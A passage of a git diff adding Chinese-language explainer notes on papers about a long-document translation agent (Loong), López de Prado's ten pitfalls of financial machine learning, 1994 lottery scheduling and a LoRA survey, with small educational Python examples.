prompt = f""" + 翻译以下句子,参考上下文: + + 【段落摘要】 + {context['essence']} + + 【参考例句】 + {context['exemplar']} + + 【实体对照】 + {context['entity']} + + 源文本:{source_sentence} + """ + + translation = llm.complete(prompt) + return translation + + def update_memory(self, source_sentence, translation, observation): + """ + 翻译后:将新信息写入 3E 记忆 + """ + # 更新实体记忆 + for entity in observation['entities']: + if entity not in self.entity_memory: + translated_entity = extract_entity_translation(entity, translation) + self.entity_memory[entity] = translated_entity + + # 存入例句记忆 + self.exemplar_memory.append({ + "source": source_sentence, + "target": translation + }) + + def translate_document(self, document, llm): + """ + 完整的翻译循环:逐句 Observe-and-Act + """ + result = [] + essence_window = [] + + for i, sentence in enumerate(document): + # 观察 + observation = self.observe(sentence, i) + + # 行动:翻译 + translation = self.act(observation, sentence, llm) + result.append(translation) + + # 更新记忆 + self.update_memory(sentence, translation, observation) + + # 定期更新精华记忆(段落摘要) + essence_window.append(sentence + " | " + translation) + if (i + 1) % 10 == 0: + summary = generate_summary("".join(essence_window)) + self.essence_memory.append(summary) + essence_window = [] + + return result +``` + +## 强化学习:让 Agent 自己优化策略 + +Loong 的 Observe-and-Act 不是一成不变的。它通过 **强化学习 (Reinforcement Learning)** 自动优化"如何选择上下文"的策略。 + +具体做法是:Agent 自己生成多条"观察—行动"的推理轨迹 (trajectories),然后从这些轨迹中构建偏好数据,训练自己做出更好的选择。 + +这个过程的关键是 **self-generated preference data**——Agent 不需要人工标注数据,它用自己的输出作为训练信号。 + +### RL 训练的简化示意 + +```python +# 生成多条 Observe-Act 轨迹 +trajectories = [] +for _ in range(num_samples): + observation = agent.observe(sentence, index) + context = build_context(observation) + translation = llm.complete(prompt_with_context) + score = evaluate_translation(translation) # 用 BLEU/BERTScore 等评分 + trajectories.append({ + "observation": observation, + "translation": translation, + "score": score + }) + +# 从高分为样本,低分为负样本,构建偏好对 +pref_data = construct_preference_pairs(trajectories) + +# 用偏好数据微调上下文选择策略 +policy = train_policy_with_dpo(pref_data) # DPO = Direct Preference Optimization +``` + +## 关键成果 + +论文中的实验结果很有说服力: + +- **多方向翻译提升**:英↔中、德、法三个翻译方向平均提升 **13.0 分**(跨越三个评估指标) +- **领域泛化能力强**:在文学、技术、新闻等不同领域都有稳定提升 +- **抗噪声鲁棒**:即使记忆中混入无关信息,Loong 也能正确忽略 +- **超长文档稳定**:文档越长,传统方法越差,Loong 的表现越能保持 + +## 为什么这个思路值得学习 + +1. **Agent 范式的实用落地**:很多 AI Agent 研究停留在概念阶段,Loong 展示了一个完整的、可运行的 Agent 架构解决真实 NLP 问题 +2. **主动记忆 vs 被动记忆**:传统 RAG 是"把所有相关内容都塞进去",Loong 是"先想清楚需要什么,再去拿"——更贴近人类的认知方式 +3. **Observe-and-Act 的通用性**:这个模式不仅适用于翻译,可以推广到代码生成、长文档摘要、多轮对话等任何需要上下文管理的任务 + +## 总结对照表 + +| 概念 | 解释 | +|------|------| +| Loong | 一个类人的长文档翻译 Agent | +| 3E Memory | 精华 (Essence) + 例句 (Exemplar) + 实体 (Entity) 三层记忆 | +| Observe | 分析当前翻译需求,查询记忆 | +| Act | 根据观察结果选择最相关上下文,执行翻译 | +| RL 优化 | Agent 用自己的推理轨迹生成偏好数据,优化选择策略 | +| 核心优势 | 不是"记住更多",而是"知道何时回忆什么" | + +## 延伸思考 + +如果你要用 Loong 的思路做一个自己的 Agent(比如代码审查 Agent),可以套用同样的框架: + +- Essence 记忆 → 之前审查过的代码段摘要 +- Exemplar 记忆 → 之前发现过的相似 bug 及其修复 +- Entity 记忆 → 项目中的函数名、API 规范的统一理解 +- Observe-and-Act → 审查某段代码前先想想"这段代码可能出什么问题",再针对性检查 + +这种"**先想再查、按需回忆**"的认知模式,可能是 Agent 设计中最有价值的范式。 diff --git a/src/content/docs/papers/lopez-de-prado-trio-2018.md b/src/content/docs/papers/lopez-de-prado-trio-2018.md new file mode 100644 index 000000000..0f9a12aa5 --- /dev/null +++ b/src/content/docs/papers/lopez-de-prado-trio-2018.md @@ -0,0 +1,244 @@ +--- +title: The 10 Reasons Most Machine Learning Funds Fail — 金融机器学习十大失败原因 +来源: https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3104816 +日期: 2026-06-13 +分类: 其他 +子分类: 量化金融 +provenance: pipeline-v3 +--- + +## 是什么 + +Marcos López de Prado 2018 年发表于 *Journal of Portfolio Management* 的短文(SSRN #3104816),系统总结了**金融机器学习(Financial ML)基金**高失败率的十个结构性错误。论文与同年出版的 *Advances in Financial Machine Learning*(AFML)一脉相承,可视为该书的「失败模式清单」。 + +日常类比:想象你开了一家**用 AI 预测天气的旅行社**。普通 ML 教程教你在「每天固定整点」采样温度、用「是否下雨」当标签、反复调参直到回测漂亮——这在气象数据上也许可行。但金融市场更像**一团不断被新闻、算法和流动性搅动的雾**:信号极弱、样本不独立、标签互相重叠、同一套历史路径只能测一次。把 ImageNet 那套流程原封不动搬过来,相当于用拍证件照的方法预测台风路径——模型越灵活,**假阳性**产出越快。 + +论文把十个陷阱分为四类(见 Exhibit 1): + +| 类别 | 陷阱 | 对策 | +|------|------|------| +| 认识论 | ① 西西弗斯范式 | 元策略(Meta-Strategy)范式 | +| 认识论 | ② 用回测做研究 | 特征重要性分析 | +| 数据处理 | ③ 按日历时间采样 | 成交量时钟(Dollar Bars) | +| 数据处理 | ④ 整数阶差分 | 分数阶差分(FracDiff) | +| 标注 | ⑤ 固定时间 horizon 标签 | 三重屏障(Triple Barrier) | +| 标注 | ⑥ 同时学方向与仓位 | 元标注(Meta-Labeling) | +| 标注 | ⑦ 非 IID 样本等权 | 唯一性加权 + 序列自助法 | +| 评估 | ⑧ 交叉验证泄漏 | Purging + Embargo | +| 评估 | ⑨ 仅 Walk-Forward 回测 | 组合净化交叉验证(CPCV) | +| 评估 | ⑩ 回测过拟合 | 收缩 Sharpe(DSR) | + +## 为什么重要 + +- **量化基金失败率本就很高**,ML 赛道更高:灵活模型 + 低信噪比 ≈ 加速制造「看起来有效」的策略 +- 论文点破一个行业潜规则:**反复回测直到 Sharpe 好看**,在 ASA 伦理指南里接近学术不端;约 20 次迭代在 5% 显著性下就能「发现」假策略 +- 后续 AFML、mlfinlab、Hudson & Thames 等生态,很多工具(FracDiff、Triple Barrier、CPCV、Meta-Labeling)都从这里长出 +- 对零基础读者:即使不做基金,也能理解**为什么 Kaggle 冠军策略不能直接上实盘**——问题不在模型,在**数据构造、标签、验证协议** + +## 核心概念(按流水线理解) + +### 1. 西西弗斯范式 vs 元策略范式 + +discretionary PM 各自为战、靠直觉下注可以分散风险;但把「雇 50 个 PhD、每人半年交一个策略」复制到 quant/ML,只会逼人在过拟合回测与拥挤因子之间二选一。元策略范式把研究拆成**流水线**:数据、特征、执行模拟、回测各自有质量标准,个人专精一环——像汽车工厂,而非每人从零造一辆车。 + +### 2. 用回测做研究 → 用特征重要性做研究 + +正确流程:`(X, y)` 上训练分类器 → 交叉验证看泛化 → **问哪些特征真正驱动性能** → 再设计经济解释与样本外检验。回测是**验收**,不是**搜索**;把回测当搜索工具,等价于对同一数据集做多次假设检验却不校正。 + +### 3. 时间 Bar 的问题与 Dollar Bar + +市场按**信息到达**而非按秒表运行。固定 5 分钟 bar 在开盘 oversample、午间 undersample,带来序列相关与异方差。Dollar bar:每成交固定**美元名义金额**采一个观测,使 bar 频率更稳定,对拆股、回购等公司行为也更鲁棒。 + +### 4. 分数阶差分:在平稳与记忆之间取平衡 + +经典做法:`log return = diff(log price, 1)` 使序列平稳,但**抹掉过多记忆**,预测力随之消失。FracDiff 用阶数 `d ∈ (0,1)`:足够小则保留记忆,足够大则通过 ADF 检验。论文举例:E-mini S&P 500 对数价在 `d≈0.4` 时可拒绝单位根,且与原序列相关约 0.995;而 `d=1` 时相关仅 0.05——**几十年实证可能一直在用过差分数据**,从而「证明」市场不可预测。 + +### 5. 三重屏障标签 + +固定 horizon 标签(h 个 bar 后涨跌)忽略波动率差异与止损现实。三重屏障:**止盈线、止损线、垂直时间/活动屏障**;先触碰哪条决定标签。标签是**路径依赖**的,与真实交易退出逻辑一致。 + +### 6. 元标注:方向与仓位解耦 + +Primary 模型负责**买还是卖**(高 recall);Secondary 模型学习「primary 的这次信号该不该跟」(提高 precision),只决定**仓位大小**。这样降低过拟合对整体行为的控制,也便于 quantamental(基本面 + ML)架构。 + +### 7. 非 IID:唯一性加权 + +标签常跨越多个 bar(重叠),像化验室**试管血样互相串了**。要对每个观测算「并发标签数」,给**唯一性高**的样本更大权重;自助抽样时优先抽高唯一性样本(Sequential Bootstrap)。 + +### 8. Purging 与 Embargo + +标准 k-fold 在 finance 会**泄漏**:`t` 与 `t+1` 特征相关,标签又因重叠而相关,测试集信息漏进训练集。Purging:删掉训练集中与测试标签**时间重叠**的样本;Embargo:在测试段之后留一段**禁训区**,防止序列相关特征泄漏。 + +### 9. CPCV vs Walk-Forward + +WF 只走**一条历史路径**,易对特定牛熊顺序过拟合;且早期决策只用很少数据。CPCV 在 N 组序列上枚举大量 train/test 组合,得到**多条回测路径**和 Sharpe **分布**,而非单点估计。 + +### 10. 回测过拟合与 DSR + +在 `I` 个独立试验、真实 Sharpe=0 的情况下,**最大样本 Sharpe 的期望仍 >0**(类似 multiple testing)。Deflated Sharpe Ratio(DSR)把「试了多少策略」纳入显著性,修正选择偏差;PSR 则处理短样本、偏度、峰度对 Sharpe 推断的影响。 + +## 代码示例 1:分数阶差分(FracDiff) + +下面用纯 NumPy 实现 FracDiff 权重与变换(教学用;生产环境可用 `mlfinlab` / `fracdiff` 包): + +```python +import numpy as np +from statsmodels.tsa.stattools import adfuller + +def fracdiff_weights(d: float, size: int) -> np.ndarray: + """Binomial-style weights w_k for fractional differentiation order d.""" + w = [1.0] + for k in range(1, size): + w.append(-w[-1] * (d - k + 1) / k) + return np.array(w) + +def fracdiff_series(x: np.ndarray, d: float, threshold: float = 1e-5) -> np.ndarray: + """ + Apply FracDiff with weight cutoff. + x: 1-D price or log-price series. + """ + w = fracdiff_weights(d, len(x)) + # Drop negligible tail weights for speed + w = w[np.abs(w) > threshold] + width = len(w) + out = np.full(len(x), np.nan) + for i in range(width - 1, len(x)): + window = x[i - width + 1 : i + 1][::-1] # x_t, x_{t-1}, ... + out[i] = np.dot(w, window) + return out + +# 演示:合成带趋势的价格序列 +np.random.seed(42) +n = 2000 +log_price = np.cumsum(np.random.randn(n) * 0.01) + 0.0002 * np.arange(n) + +for d in [0.0, 0.3, 0.5, 1.0]: + fd = fracdiff_series(log_price, d) + valid = fd[~np.isnan(fd)] + adf_stat = adfuller(valid, maxlag=1, regression="c", autolag=None)[0] + corr = np.corrcoef(log_price[-len(valid):], valid)[0, 1] + print(f"d={d:.1f} ADF={adf_stat:7.3f} corr(original)={corr:.4f}") +``` + +**预期直觉**:`d=0` 非平稳;`d` 增大 ADF 更负(更平稳)但 `corr` 下降;存在某个 `d*` 在「拒绝单位根」与「保留记忆」之间折中——这正是论文对 E-mini 的核心论点。 + +## 代码示例 2:三重屏障标签(简化版) + +```python +import numpy as np +import pandas as pd + +def triple_barrier_labels( + prices: pd.Series, + events: pd.DatetimeIndex, + pt_sl: tuple[float, float], # profit-take / stop-loss multiples of vol + vol: pd.Series, + vertical_bars: int, +) -> pd.DataFrame: + """ + Path-dependent labels: +1 upper, -1 lower, 0 vertical (optional: use sign). + prices: close series indexed by time + events: entry timestamps (must exist in prices index) + vol: e.g. rolling std of returns, aligned to prices + """ + records = [] + idx = prices.index + for t0 in events: + if t0 not in idx: + continue + i0 = idx.get_loc(t0) + p0 = prices.iloc[i0] + sigma = vol.loc[t0] + if sigma <= 0 or np.isnan(sigma): + continue + upper = p0 * (1 + pt_sl[0] * sigma) + lower = p0 * (1 - pt_sl[1] * sigma) + label = 0 + touch_time = idx[i0] + end = min(i0 + vertical_bars, len(prices) - 1) + for i in range(i0 + 1, end + 1): + p = prices.iloc[i] + if p >= upper: + label = 1 + touch_time = idx[i] + break + if p <= lower: + label = -1 + touch_time = idx[i] + break + else: + # vertical barrier first: label by return sign (paper's preference) + label = int(np.sign(prices.iloc[end] / p0 - 1)) or 0 + touch_time = idx[end] + records.append({"t0": t0, "t1": touch_time, "label": label}) + return pd.DataFrame(records).set_index("t0") + +# 用法示意 +# labels = triple_barrier_labels(close, events, pt_sl=(1.0, 1.0), vol=rolling_vol, vertical_bars=20) +``` + +与固定 horizon 标签相比,止盈/止损随**波动率缩放**,垂直屏障用 bar 数而非墙上时钟,更贴近「这笔交易何时被迫出场」。 + +## 代码示例 3:Purging 训练集(概念) + +```python +def get_label_span(label_row) -> tuple: + """label_row has t_start, t_end from triple barrier.""" + return label_row["t_start"], label_row["t_end"] + +def purged_train_indices(train_idx, test_idx, labels_df): + """ + Remove training samples whose label interval overlaps any test label interval. + labels_df indexed by event time with columns t_start, t_end. + """ + test_spans = [get_label_span(labels_df.loc[i]) for i in test_idx] + keep = [] + for i in train_idx: + ts, te = get_label_span(labels_df.loc[i]) + overlap = any(not (te < t_s or ts > t_e) for t_s, t_e in test_spans) + if not overlap: + keep.append(i) + return keep + +# Embargo: additionally drop train samples with t_start in [test_end, test_end + h] +``` + +k-fold 在 finance 上必须配合 **Purging + Embargo**,否则 CV 分数会系统性乐观。 + +## 与相关工作的关系 + +- **Bailey & López de Prado (2014)**:PBO、DSR 的数学基础——「试策略次数」必须进入推断 +- **Easley, López de Prado & O'Hara (2011–2013)**:Volume Clock / Dollar Bars 的微观结构动机 +- **AFML (2018)**:各陷阱的完整算法与章节展开(第 2 章 bars、第 4 章采样权重、第 7 章 CPCV 等) +- 与经典 **因子投资 / 线性回归**:论文开篇批评「只会协方差矩阵求逆」的 econometrics 范式;ML 应**引导理论**而非黑箱替代思考 + +## 实践检查清单(零基础版) + +1. **组织**:是否是流水线协作,而非每人独立交策略? +2. **研究循环**:是否在改特征/标签/protocol,而非改回测参数直到好看? +3. **Bars**:是否仍只用 5min/1d 时间 bar? +4. **差分**:特征是否一律用 `pct_change()`? +5. **标签**:是否固定「20 根 bar 后涨跌」? +6. **模型结构**:是否一个模型同时输出方向与仓位? +7. **样本权重**:重叠标签是否等权进 CV? +8. **CV**:是否标准 `KFold(shuffle=True)`? +9. **回测**:是否只有一条 WF 路径、一个 Sharpe 数字? +10. **显著性**:是否报告试了多少 variant、DSR/PSR 多少? + +## 局限与批判性阅读 + +- 论文来自成功 quant 实践者的**规范清单**,部分方法(CPCV、FracDiff 最优 `d`)计算成本不低 +- 「ML 优于 econometrics」的论断有**生存者偏差**;失败基金不会写论文 +- 2018 年后深度学习、另类数据、LLM 特征工程带来新的过拟合面,但**验证协议问题**(泄漏、多重试验、非 IID)依旧 +- 零基础读者应先掌握:**标签定义 > 模型选择**;**验证设计 > 调参** + +## 小结 + +López de Prado 的「十大原因」不是唱衰 ML,而是强调:**金融数据违反 ML 默认假设**。失败基金常见模式是——用 ImageNet 式流程,在极低信噪比、标签重叠、路径依赖的市场里,快速产出**统计幻觉**。解药是整套 **financial ML 协议**:Dollar bars、FracDiff、Triple barrier、Meta-labeling、Purged CV、CPCV、DSR。记住一句话:**在量化里,回测是终审法官,不是灵感搜索引擎。** + +## 延伸阅读 + +- López de Prado, M. (2018). *Advances in Financial Machine Learning*. Wiley. +- Bailey, D. & López de Prado, M. (2014). The deflated Sharpe ratio. *JPM*. +- Hudson & Thames — mlfinlab 文档中对本文 Pitfall #1–#6 的实现说明 +- 本书库:[[kelly-criterion-1956]](仓位与信息率)、因子与回测过拟合相关笔记 diff --git a/src/content/docs/papers/lottery-scheduling-1994.md b/src/content/docs/papers/lottery-scheduling-1994.md new file mode 100644 index 000000000..c3e8b87a0 --- /dev/null +++ b/src/content/docs/papers/lottery-scheduling-1994.md @@ -0,0 +1,311 @@ +--- +title: Lottery Scheduling 1994 — 用「彩票」做按比例公平分配 CPU +来源: https://www.usenix.org/legacy/publications/library/proceedings/osdi/full_papers/waldspurger.pdf +日期: 2026-06-13 +子分类: 内核与虚拟化 +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象社区活动中心只有**一台跑步机**(单核 CPU),门口排着三个人: + +- **小明**买了 75 张抽奖券 +- **小红**买了 25 张抽奖券 +- 管理员每隔一小段时间摇一次奖:**抽到谁的券,谁就上去跑一小段** + +没人能保证「下一分钟一定是小明在跑」——这是随机的。但只要摇奖次数足够多,小明大约会占到 **75%** 的上机时间,小红大约 **25%**。你不需要给每个人发固定时刻表,只要管好「每人手里有多少张券」,长期比例自然就对了。 + +这就是 **Lottery Scheduling(彩票调度)** 的核心直觉:把 **资源份额** 具象成 **彩票(ticket)**,每次分配资源时抽一张中奖券,持券越多,中奖概率越大,长期 CPU 占用率就越接近票权比例。 + +论文 **Lottery Scheduling: Flexible Proportional-Share Resource Management** 由 MIT 的 **Carl A. Waldspurger** 与 **William E. Weihl** 发表于 **OSDI 1994**,并在 **Mach 3.0 微内核** 上实现了原型调度器。它属于 **proportional-share(按比例份额)** 调度家族:不追求「最短响应时间」或「最小周转时间」,而是保证各计算任务按约定比例分享 CPU、内存、锁、I/O 带宽等稀缺资源。 + +## 这篇论文在说什么 + +| 维度 | 内容 | +|------|------| +| 会议 | First Symposium on Operating Systems Design and Implementation (**OSDI '94**), Monterey, CA | +| 作者 | Carl A. Waldspurger, William E. Weihl (MIT) | +| 核心机制 | 每次分配前抽奖;总票池为 \(T\),持 \(t\) 张票的客户中奖概率 \(p = t/T\) | +| 长期性质 | 期望分配比例与票权成正比;相对误差随分配次数 \(n_a\) 增大以 \(O(1/\sqrt{n_a})\) 收敛 | +| 扩展抽象 | Ticket transfer、inflation、currency、compensation ticket | +| 实现 | Mach 3.0 原型,时间片约 100ms;开销与标准 Mach 分时策略相当 | +| 后续 | 同作者博士论文(1995)提出确定性替代 **Stride Scheduling** | + +与 **固定优先级调度**(数字越小越重要)相比,彩票调度用**相对份额**表达重要性:说「A 比 B 重要 3 倍」只需给 A 3 张票、B 1 张票,不必纠结「A 是优先级 7 还是 8」。与 **微经济学式资源定价** 相比,彩票机制更简单、模块化,且 tickets 可当作一等对象传递。 + +## 为什么需要 proportional-share? + +传统调度器擅长两类目标: + +| 目标 | 典型算法 | 局限 | +|------|---------|------| +| 交互响应 / 吞吐 | 多级反馈队列 MLFQ | 难精确保证「A 永远拿 60% CPU」 | +| 硬实时截止 | Rate Monotonic / EDF | 关注 deadline,不是长期比例 | + +而数据库、多媒体、多租户云、科学计算集群等场景常需要:**不同用户/应用按合同或重要性获得可调的 CPU 份额**。例如: + +- 视频播放器前台窗口应比后台编码任务获得更多 CPU +- Monte Carlo 模拟中,新启动的实验希望「先快速出粗略结果」,老实验慢速 refine +- 项目组之间按经费或 SLA 划分算力 + +彩票调度把「份额」变成可编程的 **ticket**,使策略可以在用户态、应用层、系统层灵活组合。 + +## 核心概念一:Ticket 与抽奖算法 + +**Ticket(彩票)** 代表对某类资源的权利。若干客户竞争同一资源时: + +1. 设客户 \(c_i\) 持有 \(t_i\) 张票,总票池 \(T = \sum t_i\) +2. 在 \([0, T-1]\) 上均匀随机抽一个整数 `winner` +3. 按票区间累加,落在哪个客户的区间,谁赢得本次 **quantum(时间片)** + +数学上,客户 \(c_i\) 单次中奖概率 \(p_i = t_i/T\)。连续 \(n_a\) 次独立抽奖后,期望获胜次数 \(E[w_i] = n_a p_i\),方差 \(Var[w_i] = n_a p_i(1-p_i)\)。因此: + +- **短期**:可能出现明显波动(小红连续赢好几次) +- **长期**:实际占比趋近期望占比;百分比误差随 \(n_a\) 增大而缩小 + +Ticket 的三个设计性质(论文强调): + +| 性质 | 含义 | +|------|------| +| **Abstract(抽象)** | 同一张票可映射不同物理资源(CPU、锁、带宽) | +| **Relative(相对)** | 份额由占总票池比例决定,与绝对票数无关 | +| **Uniform(统一)** | 异构资源可用同一套 ticket 框架管理 | + +## 核心概念二:Ticket Transfer(票转让) + +客户端阻塞等待服务时,可**临时把票转给服务器**,避免 priority inversion 式的低效: + +``` +客户端 C 有 100 票,调用 RPC 阻塞在服务器 S 上 +→ C 把 100 票转给 S +→ S 以 C 的份额运行,尽快完成请求 +→ 返回后票收回 +``` + +这类似「我把我的排队权重借给你,让你替我把活干完」。论文指出,相比单纯提高服务器静态优先级,transfer 让**动态重要性**自然跟随调用链传递。 + +## 核心概念三:Ticket Inflation / Deflation(通胀 / 紧缩) + +在**互信**客户之间,某方可**增发票**(inflation)以提高自己短期中奖率,无需逐张转让。典型场景: + +- 用户拖动滑块提高前台视频窗口质量 → 对该窗口关联进程 inflate tickets +- 图形程序先粗渲染 wireframe(高票),再 deflation 把资源让给交互 + +Inflation 在不可信环境需谨慎:恶意进程可无限印钞。因此论文引入 **currency** 与访问控制。 + +## 核心概念四:Ticket Currency(货币) + +多个管理域(项目、用户、应用)可用**不同货币**计价票,货币之间形成**有向无环图**的兑换关系,底层锚定一种 **base currency** 的守恒票池: + +``` +系统 base: 10000 票 + ├─ 项目 A 货币(兑换率 1 A = 10 base)→ 管理员发 100 A-tickets + └─ 项目 B 货币(兑换率 1 B = 5 base) +``` + +效果: + +- **隔离**:各组策略互不干扰 +- **组合**:用户可属多组;组 A 可「资助」组 B(发 A 面额票给 B) +- **保护**:ACL 控制谁能 inflate 某种货币 + +Ticket 像「可分割、可兑换、可转让的计算经济货币」。 + +## 核心概念五:Compensation Ticket(补偿票) + +I/O 密集型进程常**用不满整个时间片**就阻塞(等磁盘、等网络)。若票权相同,CPU 密集型进程会因「多跑满片」而实际占用远超比例。 + +**补偿机制**:若某客户只用了量子的一小部分 \(f\)(例如 1/5),则在其下次参与抽奖前,临时把有效票放大到 \(1/f\) 倍,直到重新获得 CPU: + +- A、B 各 400 票,B 每次只用 1/5 量子 +- B yield 时获得补偿,下次等效 2000 票 +- 长期 A:B 实际 CPU 时间恢复 **1:1** + +这使 **proportional-share 对 I/O bound 与 CPU bound 混合负载仍然公平**。 + +## 实现:从 O(n) 链表到 O(log n) 树 + +论文给出两种实现: + +| 结构 | 单次 `allocate()` | 适用 | +|------|------------------|------| +| 链表扫描 | \(O(n_c)\) 客户数 | 原型、客户少 | +| 二叉树 partial sum | \(O(\log n_c)\) | 客户多、票分布不均 | + +优化技巧:按票数降序排列 + move-to-front,因大户中奖频率高,均摊搜索更短。 + +**动态性优势**:每次抽奖独立,**无 per-client 调度状态**需在改票数时重算。增减客户、改票分配,下一次 `allocate()` 自动反映新比例——这是随机化相对确定性 stride 的早期卖点之一。 + +## 代码示例一:最小彩票调度器(Python 模拟) + +下面用几十行 Python 模拟「每轮抽 CPU」;与论文 Figure 3-2 的 C 链表算法同构: + +```python +import random +from dataclasses import dataclass + +@dataclass +class Client: + name: str + tickets: int + wins: int = 0 + +def pick_winner(clients: list[Client]) -> Client: + """在 [0, T) 上抽 winner,线性扫描票区间(论文 list-based lottery)。""" + total = sum(c.tickets for c in clients) + winner = random.randrange(total) # 等价 fast_random() % global_tickets + runsum = 0 + for c in clients: + runsum += c.tickets + if runsum > winner: + return c + return clients[-1] + +def simulate(clients: list[Client], rounds: int = 10_000) -> None: + for _ in range(rounds): + w = pick_winner(clients) + w.wins += 1 + total_wins = sum(c.wins for c in clients) + for c in clients: + share = c.wins / total_wins + expected = c.tickets / sum(x.tickets for x in clients) + print(f"{c.name}: tickets={c.tickets}, actual={share:.1%}, expected={expected:.1%}") + +if __name__ == "__main__": + jobs = [Client("video", 75), Client("batch", 25)] + simulate(jobs) + # 典型输出:video ≈ 75%, batch ≈ 25%(随 round 数有随机波动) +``` + +运行多次可观察:**rounds=100 时波动大,rounds=100000 时非常接近 75/25**。这正是论文用概率论解释的长期公平。 + +## 代码示例二:RPC 场景下的 Ticket Transfer + +第二个例子展示 **transfer** 如何解决「客户端阻塞、服务器缺票」: + +```python +from contextlib import contextmanager + +@dataclass +class Process: + name: str + tickets: int + _saved: int = 0 + +@contextmanager +def ticket_transfer(client: Process, server: Process): + """客户端阻塞在服务器上时,临时把票转给服务器(论文 §3.1 Ticket Transfers)。""" + server._saved = server.tickets + transferred = client.tickets + server.tickets += transferred + client.tickets = 0 + try: + yield + finally: + client.tickets = transferred + server.tickets = server._saved + +def run_rpc(client: Process, server: Process) -> None: + print(f"before RPC: client={client.tickets}, server={server.tickets}") + with ticket_transfer(client, server): + print(f"during RPC: client={client.tickets}, server={server.tickets}") + # 服务器在此以 client+server 的总票权运行 + print(f"after RPC: client={client.tickets}, server={server.tickets}") + +# 用户进程 100 票,内核服务器初始 10 票 +user = Process("app", 100) +kernel_server = Process("vfs", 10) +run_rpc(user, kernel_server) +``` + +没有 transfer 时,服务器只有 10 票,即使用户再重要,RPC 处理也慢;transfer 后服务器暂时持有 110 票,**端到端延迟**与**用户应得份额**一致。 + +## 代码示例三:补偿票(Compensation)草图 + +```python +def compensate(client: Process, fraction_used: float) -> None: + """fraction_used in (0, 1];用不满量子则临时放大票权至 1/f(论文 §3.4)。""" + if fraction_used <= 0: + return + boost = int(client.tickets / fraction_used) + client.tickets = boost # 简化:下次抽奖前有效;新 quantum 开始后恢复 + +# B 与 A 各 400 票,但 B 每次 I/O 等待只用 20% 量子 +io_bound = Process("db_client", 400) +compensate(io_bound, fraction_used=0.2) # 等效 2000 票直到下次运行 +``` + +完整 Mach 实现会在 `allocate()` 末尾根据 `elapsed/quantum` 调用 `compensate()`,且补偿是**瞬态**的。 + +## 与 Stride Scheduling 的对比(论文家族延伸) + +同作者 1995 博士论文提出 **Stride Scheduling**:为每个客户维护 **stride**(步长),用确定性 pass 值选下一个运行者。 + +| 维度 | Lottery | Stride | +|------|---------|--------| +| 随机性 | 有,短期波动 | 无,短期更平滑 | +| 动态改票 | 极简单(无状态) | 需更新 pass,但也可高效 | +| 实现复杂度 | 低 | 中等 | +| 误差 | 概率收敛 | 确定性逼近份额 | + +OS 教材(如 OSTEP)常把 Lottery 作为入门,Stride 作为「想要更稳定短期行为」的进阶。Linux **CFS(Completely Fair Scheduler)** 的 `vruntime` 思想与 stride 一脉相承,而非直接抽奖。 + +## 论文实验与结论要点 + +Mach 3.0 原型实验包括: + +1. **相对执行速率控制**:动态改票后,实测 CPU 比例快速跟踪新票权 +2. **多媒体 / 视频**:配合 inflation,用户可把资源集中到当前关注窗口 +3. **Monte Carlo**:按相对误差动态调票——新实验高票快收敛,旧实验低票慢 refine +4. **多资源**:锁、内存、磁盘带宽也可用同一 ticket 框架(含 inverse lottery 等变体) + +结论:**彩票调度用极简随机机制实现了灵活、响应快的 proportional-share 控制**;模块化 ticket 抽象让策略可组合;开销与常规分时调度同量级。 + +## 局限与实务注意 + +| 问题 | 说明 | +|------|------| +| 短期不公平 | 实时音视频可能无法忍受几百毫秒内的比例抖动 → 可用 multi-winner lottery 或 stride | +| 安全性 | inflation 需 currency + ACL,防恶意印钞 | +| 单线程服务器瓶颈 | 论文指出:若服务器串行处理请求,客户端票权再合理也受限于服务器结构 | +| 多核 | 经典论文针对单资源;现代 OS 在多核上扩展需 per-CPU 运行队列与全局份额核算 | + +## 与周边知识的关系 + +```text +调度器光谱 +├── 硬实时:RM / EDF(deadline 可证明) +├── 分时交互:MLFQ / CFS(延迟与公平启发式) +└── 比例份额:Lottery / Stride / Fair-share(可编程份额) + ↑ + Waldspurger & Weihl 1994 开辟的「票权」路线 +``` + +读本文时可对照: + +- **Liu & Layland 1973**:周期任务与利用率上界(硬实时) +- **Mach 微内核**:论文实现平台 +- **《Operating Systems: Three Easy Pieces》第 9 章**:Lottery 友好入门 + +## 自测题 + +1. 三个进程票数为 2:3:5,总池 10。某进程持 3 票,单次中奖概率是多少? +2. 为何 I/O 密集进程需要 compensation ticket? +3. Ticket transfer 与单纯提高服务器静态优先级有何不同? +4. 若只有 10 次抽奖,75:25 票权的两进程,实际比例可能偏离很大,这违反 proportional-share 吗? + +
+参考答案 + +1. \(3/10 = 30\%\)。 +2. 否则 CPU 密集进程会占满更多完整量子,I/O 进程虽票权相同却实际吃亏。 +3. Transfer 把**调用者**的份额临时绑定到**当前服务链**,动态、可收回;静态优先级无法随 RPC 关系变化。 +4. 不违反。Proportional-share 通常指**长期期望或极限**意义下的比例;短期方差是 lottery 的已知代价。 + +
+ +--- + +**一句话总结**:Waldspurger & Weihl 1994 用「抽彩票」把 CPU 份额变成可传递、可通胀、可补偿的 **ticket**,在 Mach 上实现了简单、模块化、长期精确的 **proportional-share** 资源管理——为多媒体、多租户与可编程 QoS 调度开了路。 diff --git a/src/content/docs/papers/low-rank-adapt-survey.md b/src/content/docs/papers/low-rank-adapt-survey.md new file mode 100644 index 000000000..45ea80043 --- /dev/null +++ b/src/content/docs/papers/low-rank-adapt-survey.md @@ -0,0 +1,350 @@ +--- +title: Low-Rank Adaptation for Foundation Models — 一篇读懂 LoRA 全景 +来源: 'https://arxiv.org/abs/2501.00365' +日期: 2026-06-13 +分类: 机器学习 +子分类: 微调 +provenance: pipeline-v3 +--- + +## 是什么 + +这是一篇 2025 年初发表的**LoRA 全景综述论文**,由香港科技大学、耶鲁大学、新加坡南洋理工等机构的 12 位作者联合撰写。它是目前第一篇把 LoRA 从"大语言模型微调技巧"扩展到"所有基础模型适配方法"的系统性综述。 + +日常类比:想象你有一本印好的百科全书(预训练基础模型),现在需要让它回答医疗、法律、编程等不同领域的问题。传统做法是把整本书撕下来重新排版印刷(全量微调),成本极高。LoRA 的做法是在书的空白处贴几张便签纸(低秩矩阵),便签上写"遇到医疗问题按这套规则答""遇到编程问题按那套规则答"。推理的时候,读者同时看到原书内容和便签,既得到了专业答案,又不需要重新印刷整本书。 + +这篇论文把围绕"便签"做的所有改进做了系统梳理,分成了三大板块: + +- **基础层(Foundations)**:怎么让便签更小、更省空间(参数分解、剪枝、冻结共享、量化) +- 